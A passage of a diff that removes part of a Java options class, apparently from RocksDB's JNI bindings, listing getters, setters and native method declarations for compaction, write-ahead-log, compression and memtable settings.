-  @Override
-  public Options setBytesPerSync(final long bytesPerSync) {
-    assert(isOwningHandle());
-    setBytesPerSync(nativeHandle_, bytesPerSync);
-    return this;
-  }
-
-  @Override
-  public Options setWalBytesPerSync(final long walBytesPerSync) {
-    assert(isOwningHandle());
-    setWalBytesPerSync(nativeHandle_, walBytesPerSync);
-    return this;
-  }
-
-  @Override
-  public long walBytesPerSync() {
-    assert(isOwningHandle());
-    return walBytesPerSync(nativeHandle_);
-  }
-
-  @Override
-  public Options setEnableThreadTracking(final boolean enableThreadTracking) {
-    assert(isOwningHandle());
-    setEnableThreadTracking(nativeHandle_, enableThreadTracking);
-    return this;
-  }
-
-  @Override
-  public boolean enableThreadTracking() {
-    assert(isOwningHandle());
-    return enableThreadTracking(nativeHandle_);
-  }
-
-  @Override
-  public Options setDelayedWriteRate(final long delayedWriteRate) {
-    assert(isOwningHandle());
-    setDelayedWriteRate(nativeHandle_, delayedWriteRate);
-    return this;
-  }
-
-  @Override
-  public long delayedWriteRate(){
-    return delayedWriteRate(nativeHandle_);
-  }
-
-  @Override
-  public Options setAllowConcurrentMemtableWrite(
-      final boolean allowConcurrentMemtableWrite) {
-    setAllowConcurrentMemtableWrite(nativeHandle_,
-        allowConcurrentMemtableWrite);
-    return this;
-  }
-
-  @Override
-  public boolean allowConcurrentMemtableWrite() {
-    return allowConcurrentMemtableWrite(nativeHandle_);
-  }
-
-  @Override
-  public Options setEnableWriteThreadAdaptiveYield(
-      final boolean enableWriteThreadAdaptiveYield) {
-    setEnableWriteThreadAdaptiveYield(nativeHandle_,
-        enableWriteThreadAdaptiveYield);
-    return this;
-  }
-
-  @Override
-  public boolean enableWriteThreadAdaptiveYield() {
-    return enableWriteThreadAdaptiveYield(nativeHandle_);
-  }
-
-  @Override
-  public Options setWriteThreadMaxYieldUsec(final long writeThreadMaxYieldUsec) {
-    setWriteThreadMaxYieldUsec(nativeHandle_, writeThreadMaxYieldUsec);
-    return this;
-  }
-
-  @Override
-  public long writeThreadMaxYieldUsec() {
-    return writeThreadMaxYieldUsec(nativeHandle_);
-  }
-
-  @Override
-  public Options setWriteThreadSlowYieldUsec(final long writeThreadSlowYieldUsec) {
-    setWriteThreadSlowYieldUsec(nativeHandle_, writeThreadSlowYieldUsec);
-    return this;
-  }
-
-  @Override
-  public long writeThreadSlowYieldUsec() {
-    return writeThreadSlowYieldUsec(nativeHandle_);
-  }
-
-  @Override
-  public Options setSkipStatsUpdateOnDbOpen(final boolean skipStatsUpdateOnDbOpen) {
-    assert(isOwningHandle());
-    setSkipStatsUpdateOnDbOpen(nativeHandle_, skipStatsUpdateOnDbOpen);
-    return this;
-  }
-
-  @Override
-  public boolean skipStatsUpdateOnDbOpen() {
-    assert(isOwningHandle());
-    return skipStatsUpdateOnDbOpen(nativeHandle_);
-  }
-
-  @Override
-  public Options setWalRecoveryMode(final WALRecoveryMode walRecoveryMode) {
-    assert(isOwningHandle());
-    setWalRecoveryMode(nativeHandle_, walRecoveryMode.getValue());
-    return this;
-  }
-
-  @Override
-  public WALRecoveryMode walRecoveryMode() {
-    assert(isOwningHandle());
-    return WALRecoveryMode.getWALRecoveryMode(walRecoveryMode(nativeHandle_));
-  }
-
-  @Override
-  public Options setAllow2pc(final boolean allow2pc) {
-    assert(isOwningHandle());
-    setAllow2pc(nativeHandle_, allow2pc);
-    return this;
-  }
-
-  @Override
-  public boolean allow2pc() {
-    assert(isOwningHandle());
-    return allow2pc(nativeHandle_);
-  }
-
-  @Override
-  public Options setRowCache(final Cache rowCache) {
-    assert(isOwningHandle());
-    setRowCache(nativeHandle_, rowCache.nativeHandle_);
-    this.rowCache_ = rowCache;
-    return this;
-  }
-
-  @Override
-  public Cache rowCache() {
-    assert(isOwningHandle());
-    return this.rowCache_;
-  }
-
-  @Override
-  public Options setFailIfOptionsFileError(final boolean failIfOptionsFileError) {
-    assert(isOwningHandle());
-    setFailIfOptionsFileError(nativeHandle_, failIfOptionsFileError);
-    return this;
-  }
-
-  @Override
-  public boolean failIfOptionsFileError() {
-    assert(isOwningHandle());
-    return failIfOptionsFileError(nativeHandle_);
-  }
-
-  @Override
-  public Options setDumpMallocStats(final boolean dumpMallocStats) {
-    assert(isOwningHandle());
-    setDumpMallocStats(nativeHandle_, dumpMallocStats);
-    return this;
-  }
-
-  @Override
-  public boolean dumpMallocStats() {
-    assert(isOwningHandle());
-    return dumpMallocStats(nativeHandle_);
-  }
-
-  @Override
-  public Options setAvoidFlushDuringRecovery(final boolean avoidFlushDuringRecovery) {
-    assert(isOwningHandle());
-    setAvoidFlushDuringRecovery(nativeHandle_, avoidFlushDuringRecovery);
-    return this;
-  }
-
-  @Override
-  public boolean avoidFlushDuringRecovery() {
-    assert(isOwningHandle());
-    return avoidFlushDuringRecovery(nativeHandle_);
-  }
-
-  @Override
-  public Options setAvoidFlushDuringShutdown(final boolean avoidFlushDuringShutdown) {
-    assert(isOwningHandle());
-    setAvoidFlushDuringShutdown(nativeHandle_, avoidFlushDuringShutdown);
-    return this;
-  }
-
-  @Override
-  public boolean avoidFlushDuringShutdown() {
-    assert(isOwningHandle());
-    return avoidFlushDuringShutdown(nativeHandle_);
-  }
-
-  @Override
-  public MemTableConfig memTableConfig() {
-    return this.memTableConfig_;
-  }
-
-  @Override
-  public Options setMemTableConfig(final MemTableConfig config) {
-    memTableConfig_ = config;
-    setMemTableFactory(nativeHandle_, config.newMemTableFactoryHandle());
-    return this;
-  }
-
-  @Override
-  public Options setRateLimiter(final RateLimiter rateLimiter) {
-    assert(isOwningHandle());
-    rateLimiter_ = rateLimiter;
-    setRateLimiter(nativeHandle_, rateLimiter.nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public Options setLogger(final Logger logger) {
-    assert(isOwningHandle());
-    setLogger(nativeHandle_, logger.nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public Options setInfoLogLevel(final InfoLogLevel infoLogLevel) {
-    assert(isOwningHandle());
-    setInfoLogLevel(nativeHandle_, infoLogLevel.getValue());
-    return this;
-  }
-
-  @Override
-  public InfoLogLevel infoLogLevel() {
-    assert(isOwningHandle());
-    return InfoLogLevel.getInfoLogLevel(
-        infoLogLevel(nativeHandle_));
-  }
-
-  @Override
-  public String memTableFactoryName() {
-    assert(isOwningHandle());
-    return memTableFactoryName(nativeHandle_);
-  }
-
-  @Override
-  public TableFormatConfig tableFormatConfig() {
-    return this.tableFormatConfig_;
-  }
-
-  @Override
-  public Options setTableFormatConfig(final TableFormatConfig config) {
-    tableFormatConfig_ = config;
-    setTableFactory(nativeHandle_, config.newTableFactoryHandle());
-    return this;
-  }
-
-  @Override
-  public String tableFactoryName() {
-    assert(isOwningHandle());
-    return tableFactoryName(nativeHandle_);
-  }
-
-  @Override
-  public Options useFixedLengthPrefixExtractor(final int n) {
-    assert(isOwningHandle());
-    useFixedLengthPrefixExtractor(nativeHandle_, n);
-    return this;
-  }
-
-  @Override
-  public Options useCappedPrefixExtractor(final int n) {
-    assert(isOwningHandle());
-    useCappedPrefixExtractor(nativeHandle_, n);
-    return this;
-  }
-
-  @Override
-  public CompressionType compressionType() {
-    return CompressionType.getCompressionType(compressionType(nativeHandle_));
-  }
-
-  @Override
-  public Options setCompressionPerLevel(
-      final List<CompressionType> compressionLevels) {
-    final byte[] byteCompressionTypes = new byte[
-        compressionLevels.size()];
-    for (int i = 0; i < compressionLevels.size(); i++) {
-      byteCompressionTypes[i] = compressionLevels.get(i).getValue();
-    }
-    setCompressionPerLevel(nativeHandle_, byteCompressionTypes);
-    return this;
-  }
-
-  @Override
-  public List<CompressionType> compressionPerLevel() {
-    final byte[] byteCompressionTypes =
-        compressionPerLevel(nativeHandle_);
-    final List<CompressionType> compressionLevels = new ArrayList<>();
-    for (final Byte byteCompressionType : byteCompressionTypes) {
-      compressionLevels.add(CompressionType.getCompressionType(
-          byteCompressionType));
-    }
-    return compressionLevels;
-  }
-
-  @Override
-  public Options setCompressionType(CompressionType compressionType) {
-    setCompressionType(nativeHandle_, compressionType.getValue());
-    return this;
-  }
-
-
-  @Override
-  public Options setBottommostCompressionType(
-      final CompressionType bottommostCompressionType) {
-    setBottommostCompressionType(nativeHandle_,
-        bottommostCompressionType.getValue());
-    return this;
-  }
-
-  @Override
-  public CompressionType bottommostCompressionType() {
-    return CompressionType.getCompressionType(
-        bottommostCompressionType(nativeHandle_));
-  }
-
-  @Override
-  public Options setCompressionOptions(
-      final CompressionOptions compressionOptions) {
-    setCompressionOptions(nativeHandle_, compressionOptions.nativeHandle_);
-    this.compressionOptions_ = compressionOptions;
-    return this;
-  }
-
-  @Override
-  public CompressionOptions compressionOptions() {
-    return this.compressionOptions_;
-  }
-
-  @Override
-  public CompactionStyle compactionStyle() {
-    return CompactionStyle.values()[compactionStyle(nativeHandle_)];
-  }
-
-  @Override
-  public Options setCompactionStyle(
-      final CompactionStyle compactionStyle) {
-    setCompactionStyle(nativeHandle_, compactionStyle.getValue());
-    return this;
-  }
-
-  @Override
-  public int numLevels() {
-    return numLevels(nativeHandle_);
-  }
-
-  @Override
-  public Options setNumLevels(int numLevels) {
-    setNumLevels(nativeHandle_, numLevels);
-    return this;
-  }
-
-  @Override
-  public int levelZeroFileNumCompactionTrigger() {
-    return levelZeroFileNumCompactionTrigger(nativeHandle_);
-  }
-
-  @Override
-  public Options setLevelZeroFileNumCompactionTrigger(
-      final int numFiles) {
-    setLevelZeroFileNumCompactionTrigger(
-        nativeHandle_, numFiles);
-    return this;
-  }
-
-  @Override
-  public int levelZeroSlowdownWritesTrigger() {
-    return levelZeroSlowdownWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public Options setLevelZeroSlowdownWritesTrigger(
-      final int numFiles) {
-    setLevelZeroSlowdownWritesTrigger(nativeHandle_, numFiles);
-    return this;
-  }
-
-  @Override
-  public int levelZeroStopWritesTrigger() {
-    return levelZeroStopWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public Options setLevelZeroStopWritesTrigger(
-      final int numFiles) {
-    setLevelZeroStopWritesTrigger(nativeHandle_, numFiles);
-    return this;
-  }
-
-  @Override
-  public long targetFileSizeBase() {
-    return targetFileSizeBase(nativeHandle_);
-  }
-
-  @Override
-  public Options setTargetFileSizeBase(long targetFileSizeBase) {
-    setTargetFileSizeBase(nativeHandle_, targetFileSizeBase);
-    return this;
-  }
-
-  @Override
-  public int targetFileSizeMultiplier() {
-    return targetFileSizeMultiplier(nativeHandle_);
-  }
-
-  @Override
-  public Options setTargetFileSizeMultiplier(int multiplier) {
-    setTargetFileSizeMultiplier(nativeHandle_, multiplier);
-    return this;
-  }
-
-  @Override
-  public Options setMaxBytesForLevelBase(final long maxBytesForLevelBase) {
-    setMaxBytesForLevelBase(nativeHandle_, maxBytesForLevelBase);
-    return this;
-  }
-
-  @Override
-  public long maxBytesForLevelBase() {
-    return maxBytesForLevelBase(nativeHandle_);
-  }
-
-  @Override
-  public Options setLevelCompactionDynamicLevelBytes(
-      final boolean enableLevelCompactionDynamicLevelBytes) {
-    setLevelCompactionDynamicLevelBytes(nativeHandle_,
-        enableLevelCompactionDynamicLevelBytes);
-    return this;
-  }
-
-  @Override
-  public boolean levelCompactionDynamicLevelBytes() {
-    return levelCompactionDynamicLevelBytes(nativeHandle_);
-  }
-
-  @Override
-  public double maxBytesForLevelMultiplier() {
-    return maxBytesForLevelMultiplier(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxBytesForLevelMultiplier(final double multiplier) {
-    setMaxBytesForLevelMultiplier(nativeHandle_, multiplier);
-    return this;
-  }
-
-  @Override
-  public long maxCompactionBytes() {
-    return maxCompactionBytes(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxCompactionBytes(final long maxCompactionBytes) {
-    setMaxCompactionBytes(nativeHandle_, maxCompactionBytes);
-    return this;
-  }
-
-  @Override
-  public long arenaBlockSize() {
-    return arenaBlockSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setArenaBlockSize(final long arenaBlockSize) {
-    setArenaBlockSize(nativeHandle_, arenaBlockSize);
-    return this;
-  }
-
-  @Override
-  public boolean disableAutoCompactions() {
-    return disableAutoCompactions(nativeHandle_);
-  }
-
-  @Override
-  public Options setDisableAutoCompactions(
-      final boolean disableAutoCompactions) {
-    setDisableAutoCompactions(nativeHandle_, disableAutoCompactions);
-    return this;
-  }
-
-  @Override
-  public long maxSequentialSkipInIterations() {
-    return maxSequentialSkipInIterations(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxSequentialSkipInIterations(
-      final long maxSequentialSkipInIterations) {
-    setMaxSequentialSkipInIterations(nativeHandle_,
-        maxSequentialSkipInIterations);
-    return this;
-  }
-
-  @Override
-  public boolean inplaceUpdateSupport() {
-    return inplaceUpdateSupport(nativeHandle_);
-  }
-
-  @Override
-  public Options setInplaceUpdateSupport(
-      final boolean inplaceUpdateSupport) {
-    setInplaceUpdateSupport(nativeHandle_, inplaceUpdateSupport);
-    return this;
-  }
-
-  @Override
-  public long inplaceUpdateNumLocks() {
-    return inplaceUpdateNumLocks(nativeHandle_);
-  }
-
-  @Override
-  public Options setInplaceUpdateNumLocks(
-      final long inplaceUpdateNumLocks) {
-    setInplaceUpdateNumLocks(nativeHandle_, inplaceUpdateNumLocks);
-    return this;
-  }
-
-  @Override
-  public double memtablePrefixBloomSizeRatio() {
-    return memtablePrefixBloomSizeRatio(nativeHandle_);
-  }
-
-  @Override
-  public Options setMemtablePrefixBloomSizeRatio(final double memtablePrefixBloomSizeRatio) {
-    setMemtablePrefixBloomSizeRatio(nativeHandle_, memtablePrefixBloomSizeRatio);
-    return this;
-  }
-
-  @Override
-  public int bloomLocality() {
-    return bloomLocality(nativeHandle_);
-  }
-
-  @Override
-  public Options setBloomLocality(final int bloomLocality) {
-    setBloomLocality(nativeHandle_, bloomLocality);
-    return this;
-  }
-
-  @Override
-  public long maxSuccessiveMerges() {
-    return maxSuccessiveMerges(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxSuccessiveMerges(long maxSuccessiveMerges) {
-    setMaxSuccessiveMerges(nativeHandle_, maxSuccessiveMerges);
-    return this;
-  }
-
-  @Override
-  public int minWriteBufferNumberToMerge() {
-    return minWriteBufferNumberToMerge(nativeHandle_);
-  }
-
-  @Override
-  public Options setMinWriteBufferNumberToMerge(
-      final int minWriteBufferNumberToMerge) {
-    setMinWriteBufferNumberToMerge(nativeHandle_, minWriteBufferNumberToMerge);
-    return this;
-  }
-
-  @Override
-  public Options setOptimizeFiltersForHits(
-      final boolean optimizeFiltersForHits) {
-    setOptimizeFiltersForHits(nativeHandle_, optimizeFiltersForHits);
-    return this;
-  }
-
-  @Override
-  public boolean optimizeFiltersForHits() {
-    return optimizeFiltersForHits(nativeHandle_);
-  }
-
-  @Override
-  public Options
-  setMemtableHugePageSize(
-      long memtableHugePageSize) {
-    setMemtableHugePageSize(nativeHandle_,
-        memtableHugePageSize);
-    return this;
-  }
-
-  @Override
-  public long memtableHugePageSize() {
-    return memtableHugePageSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setSoftPendingCompactionBytesLimit(long softPendingCompactionBytesLimit) {
-    setSoftPendingCompactionBytesLimit(nativeHandle_,
-        softPendingCompactionBytesLimit);
-    return this;
-  }
-
-  @Override
-  public long softPendingCompactionBytesLimit() {
-    return softPendingCompactionBytesLimit(nativeHandle_);
-  }
-
-  @Override
-  public Options setHardPendingCompactionBytesLimit(long hardPendingCompactionBytesLimit) {
-    setHardPendingCompactionBytesLimit(nativeHandle_, hardPendingCompactionBytesLimit);
-    return this;
-  }
-
-  @Override
-  public long hardPendingCompactionBytesLimit() {
-    return hardPendingCompactionBytesLimit(nativeHandle_);
-  }
-
-  @Override
-  public Options setLevel0FileNumCompactionTrigger(int level0FileNumCompactionTrigger) {
-    setLevel0FileNumCompactionTrigger(nativeHandle_, level0FileNumCompactionTrigger);
-    return this;
-  }
-
-  @Override
-  public int level0FileNumCompactionTrigger() {
-    return level0FileNumCompactionTrigger(nativeHandle_);
-  }
-
-  @Override
-  public Options setLevel0SlowdownWritesTrigger(int level0SlowdownWritesTrigger) {
-    setLevel0SlowdownWritesTrigger(nativeHandle_, level0SlowdownWritesTrigger);
-    return this;
-  }
-
-  @Override
-  public int level0SlowdownWritesTrigger() {
-    return level0SlowdownWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public Options setLevel0StopWritesTrigger(int level0StopWritesTrigger) {
-    setLevel0StopWritesTrigger(nativeHandle_, level0StopWritesTrigger);
-    return this;
-  }
-
-  @Override
-  public int level0StopWritesTrigger() {
-    return level0StopWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxBytesForLevelMultiplierAdditional(int[] maxBytesForLevelMultiplierAdditional) {
-    setMaxBytesForLevelMultiplierAdditional(nativeHandle_, maxBytesForLevelMultiplierAdditional);
-    return this;
-  }
-
-  @Override
-  public int[] maxBytesForLevelMultiplierAdditional() {
-    return maxBytesForLevelMultiplierAdditional(nativeHandle_);
-  }
-
-  @Override
-  public Options setParanoidFileChecks(boolean paranoidFileChecks) {
-    setParanoidFileChecks(nativeHandle_, paranoidFileChecks);
-    return this;
-  }
-
-  @Override
-  public boolean paranoidFileChecks() {
-    return paranoidFileChecks(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxWriteBufferNumberToMaintain(
-      final int maxWriteBufferNumberToMaintain) {
-    setMaxWriteBufferNumberToMaintain(
-        nativeHandle_, maxWriteBufferNumberToMaintain);
-    return this;
-  }
-
-  @Override
-  public int maxWriteBufferNumberToMaintain() {
-    return maxWriteBufferNumberToMaintain(nativeHandle_);
-  }
-
-  @Override
-  public Options setCompactionPriority(
-      final CompactionPriority compactionPriority) {
-    setCompactionPriority(nativeHandle_, compactionPriority.getValue());
-    return this;
-  }
-
-  @Override
-  public CompactionPriority compactionPriority() {
-    return CompactionPriority.getCompactionPriority(
-        compactionPriority(nativeHandle_));
-  }
-
-  @Override
-  public Options setReportBgIoStats(final boolean reportBgIoStats) {
-    setReportBgIoStats(nativeHandle_, reportBgIoStats);
-    return this;
-  }
-
-  @Override
-  public boolean reportBgIoStats() {
-    return reportBgIoStats(nativeHandle_);
-  }
-
-  @Override
-  public Options setCompactionOptionsUniversal(
-      final CompactionOptionsUniversal compactionOptionsUniversal) {
-    setCompactionOptionsUniversal(nativeHandle_,
-        compactionOptionsUniversal.nativeHandle_);
-    this.compactionOptionsUniversal_ = compactionOptionsUniversal;
-    return this;
-  }
-
-  @Override
-  public CompactionOptionsUniversal compactionOptionsUniversal() {
-    return this.compactionOptionsUniversal_;
-  }
-
-  @Override
-  public Options setCompactionOptionsFIFO(final CompactionOptionsFIFO compactionOptionsFIFO) {
-    setCompactionOptionsFIFO(nativeHandle_,
-        compactionOptionsFIFO.nativeHandle_);
-    this.compactionOptionsFIFO_ = compactionOptionsFIFO;
-    return this;
-  }
-
-  @Override
-  public CompactionOptionsFIFO compactionOptionsFIFO() {
-    return this.compactionOptionsFIFO_;
-  }
-
-  @Override
-  public Options setForceConsistencyChecks(final boolean forceConsistencyChecks) {
-    setForceConsistencyChecks(nativeHandle_, forceConsistencyChecks);
-    return this;
-  }
-
-  @Override
-  public boolean forceConsistencyChecks() {
-    return forceConsistencyChecks(nativeHandle_);
-  }
-
-  private native static long newOptions();
-  private native static long newOptions(long dbOptHandle,
-      long cfOptHandle);
-  @Override protected final native void disposeInternal(final long handle);
-  private native void setEnv(long optHandle, long envHandle);
-  private native void prepareForBulkLoad(long handle);
-
-  // DB native handles
-  private native void setIncreaseParallelism(long handle, int totalThreads);
-  private native void setCreateIfMissing(long handle, boolean flag);
-  private native boolean createIfMissing(long handle);
-  private native void setCreateMissingColumnFamilies(
-      long handle, boolean flag);
-  private native boolean createMissingColumnFamilies(long handle);
-  private native void setErrorIfExists(long handle, boolean errorIfExists);
-  private native boolean errorIfExists(long handle);
-  private native void setParanoidChecks(
-      long handle, boolean paranoidChecks);
-  private native boolean paranoidChecks(long handle);
-  private native void setRateLimiter(long handle,
-      long rateLimiterHandle);
-  private native void setLogger(long handle,
-      long loggerHandle);
-  private native void setInfoLogLevel(long handle, byte logLevel);
-  private native byte infoLogLevel(long handle);
-  private native void setMaxOpenFiles(long handle, int maxOpenFiles);
-  private native int maxOpenFiles(long handle);
-  private native void setMaxTotalWalSize(long handle,
-      long maxTotalWalSize);
-  private native void setMaxFileOpeningThreads(final long handle,
-      final int maxFileOpeningThreads);
-  private native int maxFileOpeningThreads(final long handle);
-  private native long maxTotalWalSize(long handle);
-  private native void setStatistics(final long handle, final long statisticsHandle);
-  private native long statistics(final long handle);
-  private native boolean useFsync(long handle);
-  private native void setUseFsync(long handle, boolean useFsync);
-  private native void setDbPaths(final long handle, final String[] paths,
-      final long[] targetSizes);
-  private native long dbPathsLen(final long handle);
-  private native void dbPaths(final long handle, final String[] paths,
-      final long[] targetSizes);
-  private native void setDbLogDir(long handle, String dbLogDir);
-  private native String dbLogDir(long handle);
-  private native void setWalDir(long handle, String walDir);
-  private native String walDir(long handle);
-  private native void setDeleteObsoleteFilesPeriodMicros(
-      long handle, long micros);
-  private native long deleteObsoleteFilesPeriodMicros(long handle);
-  private native void setBaseBackgroundCompactions(long handle,
-      int baseBackgroundCompactions);
-  private native int baseBackgroundCompactions(long handle);
-  private native void setMaxBackgroundCompactions(
-      long handle, int maxBackgroundCompactions);
-  private native int maxBackgroundCompactions(long handle);
-  private native void setMaxSubcompactions(long handle, int maxSubcompactions);
-  private native int maxSubcompactions(long handle);
-  private native void setMaxBackgroundFlushes(
-      long handle, int maxBackgroundFlushes);
-  private native int maxBackgroundFlushes(long handle);
-  private native void setMaxLogFileSize(long handle, long maxLogFileSize)
-      throws IllegalArgumentException;
-  private native long maxLogFileSize(long handle);
-  private native void setLogFileTimeToRoll(
-      long handle, long logFileTimeToRoll) throws IllegalArgumentException;
-  private native long logFileTimeToRoll(long handle);
-  private native void setKeepLogFileNum(long handle, long keepLogFileNum)
-      throws IllegalArgumentException;
-  private native long keepLogFileNum(long handle);
-  private native void setRecycleLogFileNum(long handle, long recycleLogFileNum);
-  private native long recycleLogFileNum(long handle);
-  private native void setMaxManifestFileSize(
-      long handle, long maxManifestFileSize);
-  private native long maxManifestFileSize(long handle);
-  private native void setMaxTableFilesSizeFIFO(
-      long handle, long maxTableFilesSize);
-  private native long maxTableFilesSizeFIFO(long handle);
-  private native void setTableCacheNumshardbits(
-      long handle, int tableCacheNumshardbits);
-  private native int tableCacheNumshardbits(long handle);
-  private native void setWalTtlSeconds(long handle, long walTtlSeconds);
-  private native long walTtlSeconds(long handle);
-  private native void setWalSizeLimitMB(long handle, long sizeLimitMB);
-  private native long walSizeLimitMB(long handle);
-  private native void setManifestPreallocationSize(
-      long handle, long size) throws IllegalArgumentException;
-  private native long manifestPreallocationSize(long handle);
-  private native void setUseDirectReads(long handle, boolean useDirectReads);
-  private native boolean useDirectReads(long handle);
-  private native void setUseDirectIoForFlushAndCompaction(
-      long handle, boolean useDirectIoForFlushAndCompaction);
-  private native boolean useDirectIoForFlushAndCompaction(long handle);
-  private native void setAllowFAllocate(final long handle,
-      final boolean allowFAllocate);
-  private native boolean allowFAllocate(final long handle);
-  private native void setAllowMmapReads(
-      long handle, boolean allowMmapReads);
-  private native boolean allowMmapReads(long handle);
-  private native void setAllowMmapWrites(
-      long handle, boolean allowMmapWrites);
-  private native boolean allowMmapWrites(long handle);
-  private native void setIsFdCloseOnExec(
-      long handle, boolean isFdCloseOnExec);
-  private native boolean isFdCloseOnExec(long handle);
-  private native void setStatsDumpPeriodSec(
-      long handle, int statsDumpPeriodSec);
-  private native int statsDumpPeriodSec(long handle);
-  private native void setAdviseRandomOnOpen(
-      long handle, boolean adviseRandomOnOpen);
-  private native boolean adviseRandomOnOpen(long handle);
-  private native void setDbWriteBufferSize(final long handle,
-      final long dbWriteBufferSize);
-  private native long dbWriteBufferSize(final long handle);
-  private native void setAccessHintOnCompactionStart(final long handle,
-      final byte accessHintOnCompactionStart);
-  private native byte accessHintOnCompactionStart(final long handle);
-  private native void setNewTableReaderForCompactionInputs(final long handle,
-      final boolean newTableReaderForCompactionInputs);
-  private native boolean newTableReaderForCompactionInputs(final long handle);
-  private native void setCompactionReadaheadSize(final long handle,
-      final long compactionReadaheadSize);
-  private native long compactionReadaheadSize(final long handle);
-  private native void setRandomAccessMaxBufferSize(final long handle,
-      final long randomAccessMaxBufferSize);
-  private native long randomAccessMaxBufferSize(final long handle);
-  private native void setWritableFileMaxBufferSize(final long handle,
-      final long writableFileMaxBufferSize);
-  private native long writableFileMaxBufferSize(final long handle);
-  private native void setUseAdaptiveMutex(
-      long handle, boolean useAdaptiveMutex);
-  private native boolean useAdaptiveMutex(long handle);
-  private native void setBytesPerSync(
-      long handle, long bytesPerSync);
-  private native long bytesPerSync(long handle);
-  private native void setWalBytesPerSync(long handle, long walBytesPerSync);
-  private native long walBytesPerSync(long handle);
-  private native void setEnableThreadTracking(long handle,
-      boolean enableThreadTracking);
-  private native boolean enableThreadTracking(long handle);
-  private native void setDelayedWriteRate(long handle, long delayedWriteRate);
-  private native long delayedWriteRate(long handle);
-  private native void setAllowConcurrentMemtableWrite(long handle,
-      boolean allowConcurrentMemtableWrite);
-  private native boolean allowConcurrentMemtableWrite(long handle);
-  private native void setEnableWriteThreadAdaptiveYield(long handle,
-      boolean enableWriteThreadAdaptiveYield);
-  private native boolean enableWriteThreadAdaptiveYield(long handle);
-  private native void setWriteThreadMaxYieldUsec(long handle,
-      long writeThreadMaxYieldUsec);
-  private native long writeThreadMaxYieldUsec(long handle);
-  private native void setWriteThreadSlowYieldUsec(long handle,
-      long writeThreadSlowYieldUsec);
-  private native long writeThreadSlowYieldUsec(long handle);
-  private native void setSkipStatsUpdateOnDbOpen(final long handle,
-      final boolean skipStatsUpdateOnDbOpen);
-  private native boolean skipStatsUpdateOnDbOpen(final long handle);
-  private native void setWalRecoveryMode(final long handle,
-      final byte walRecoveryMode);
-  private native byte walRecoveryMode(final long handle);
-  private native void setAllow2pc(final long handle,
-      final boolean allow2pc);
-  private native boolean allow2pc(final long handle);
-  private native void setRowCache(final long handle,
-      final long row_cache_handle);
-  private native void setFailIfOptionsFileError(final long handle,
-      final boolean failIfOptionsFileError);
-  private native boolean failIfOptionsFileError(final long handle);
-  private native void setDumpMallocStats(final long handle,
-      final boolean dumpMallocStats);
-  private native boolean dumpMallocStats(final long handle);
-  private native void setAvoidFlushDuringRecovery(final long handle,
-      final boolean avoidFlushDuringRecovery);
-  private native boolean avoidFlushDuringRecovery(final long handle);
-  private native void setAvoidFlushDuringShutdown(final long handle,
-      final boolean avoidFlushDuringShutdown);
-  private native boolean avoidFlushDuringShutdown(final long handle);
-
-  // CF native handles
-  private native void optimizeForSmallDb(final long handle);
-  private native void optimizeForPointLookup(long handle,
-      long blockCacheSizeMb);
-  private native void optimizeLevelStyleCompaction(long handle,
-      long memtableMemoryBudget);
-  private native void optimizeUniversalStyleCompaction(long handle,
-      long memtableMemoryBudget);
-  private native void setComparatorHandle(long handle, int builtinComparator);
-  private native void setComparatorHandle(long optHandle,
-      long comparatorHandle);
-  private native void setMergeOperatorName(
-      long handle, String name);
-  private native void setMergeOperator(
-      long handle, long mergeOperatorHandle);
-  private native void setWriteBufferSize(long handle, long writeBufferSize)
-      throws IllegalArgumentException;
-  private native long writeBufferSize(long handle);
-  private native void setMaxWriteBufferNumber(
-      long handle, int maxWriteBufferNumber);
-  private native int maxWriteBufferNumber(long handle);
-  private native void setMinWriteBufferNumberToMerge(
-      long handle, int minWriteBufferNumberToMerge);
-  private native int minWriteBufferNumberToMerge(long handle);
-  private native void setCompressionType(long handle, byte compressionType);
-  private native byte compressionType(long handle);
-  private native void setCompressionPerLevel(long handle,
-      byte[] compressionLevels);
-  private native byte[] compressionPerLevel(long handle);
-  private native void setBottommostCompressionType(long handle,
-      byte bottommostCompressionType);
-  private native byte bottommostCompressionType(long handle);
-  private native void setCompressionOptions(long handle,
-      long compressionOptionsHandle);
-  private native void useFixedLengthPrefixExtractor(
-      long handle, int prefixLength);
-  private native void useCappedPrefixExtractor(
-      long handle, int prefixLength);
-  private native void setNumLevels(
-      long handle, int numLevels);
-  private native int numLevels(long handle);
-  private native void setLevelZeroFileNumCompactionTrigger(
-      long handle, int numFiles);
-  private native int levelZeroFileNumCompactionTrigger(long handle);
-  private native void setLevelZeroSlowdownWritesTrigger(
-      long handle, int numFiles);
-  private native int levelZeroSlowdownWritesTrigger(long handle);
-  private native void setLevelZeroStopWritesTrigger(
-      long handle, int numFiles);
-  private native int levelZeroStopWritesTrigger(long handle);
-  private native void setTargetFileSizeBase(
-      long handle, long targetFileSizeBase);
-  private native long targetFileSizeBase(long handle);
-  private native void setTargetFileSizeMultiplier(
-      long handle, int multiplier);
-  private native int targetFileSizeMultiplier(long handle);
-  private native void setMaxBytesForLevelBase(
-      long handle, long maxBytesForLevelBase);
-  private native long maxBytesForLevelBase(long handle);
-  private native void setLevelCompactionDynamicLevelBytes(
-      long handle, boolean enableLevelCompactionDynamicLevelBytes);
-  private native boolean levelCompactionDynamicLevelBytes(
-      long handle);
-  private native void setMaxBytesForLevelMultiplier(long handle, double multiplier);
-  private native double maxBytesForLevelMultiplier(long handle);
-  private native void setMaxCompactionBytes(long handle, long maxCompactionBytes);
-  private native long maxCompactionBytes(long handle);
-  private native void setArenaBlockSize(
-      long handle, long arenaBlockSize) throws IllegalArgumentException;
-  private native long arenaBlockSize(long handle);
-  private native void setDisableAutoCompactions(
-      long handle, boolean disableAutoCompactions);
-  private native boolean disableAutoCompactions(long handle);
-  private native void setCompactionStyle(long handle, byte compactionStyle);
-  private native byte compactionStyle(long handle);
-  private native void setMaxSequentialSkipInIterations(
-      long handle, long maxSequentialSkipInIterations);
